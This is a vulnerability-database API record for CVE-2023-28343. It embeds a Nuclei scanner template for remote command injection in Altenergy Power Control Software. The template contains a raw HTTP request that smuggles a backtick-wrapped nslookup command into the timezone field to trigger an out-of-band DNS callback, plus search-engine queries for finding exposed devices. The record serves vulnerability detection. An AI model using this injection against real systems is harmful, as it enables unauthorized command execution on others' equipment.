{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-28343/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-28343/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-28343/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-28343/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-28343/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-28343"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-28343"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-28343.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-28343\n\ninfo:\n  name: Altenergy Power Control Software C1.2.5 - Remote Command Injection\n  author: pikpikcu\n  severity: critical\n  description: |\n    Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n  impact: |\n    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n  remediation: |\n    Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability.\n  reference:\n    - https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md\n    - https://apsystems.com\n    - http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-28343\n    - https://github.com/hba343434/CVE-2023-28343\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-28343\n    cwe-id: CWE-78\n    epss-score: 0.84752\n    epss-percentile: 0.99702\n    cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: apsystems\n    product: energy_communication_unit_firmware\n    shodan-query:\n      - title:\"Altenergy Power Control Software\"\n      - http.title:\"altenergy power control software\"\n    fofa-query: title=\"altenergy power control software\"\n    google-query:\n      - intitle:\"Altenergy Power Control Software\"\n      - intitle:\"altenergy power control software\"\n  tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /index.php/management/set_timezone HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n        X-Requested-With: XMLHttpRequest\n        Accept-Encoding: gzip, deflate\n        Referer: {{RootURL}}/index.php/management/datetime\n\n        timezone=`nslookup {{interactsh-url}}`\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the DNS Interaction\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body\n        words:\n          - \"Time Zone updated successfully\"\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100bc8144f35df660fe4417b84d5d3f509b907e1a2fea4aab60c9a6e6a3fcedeeb80220124a57c5d36c56dfa66e20c1cb7cbefb73423322311db1664e74e290ccd22080:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-28343"
}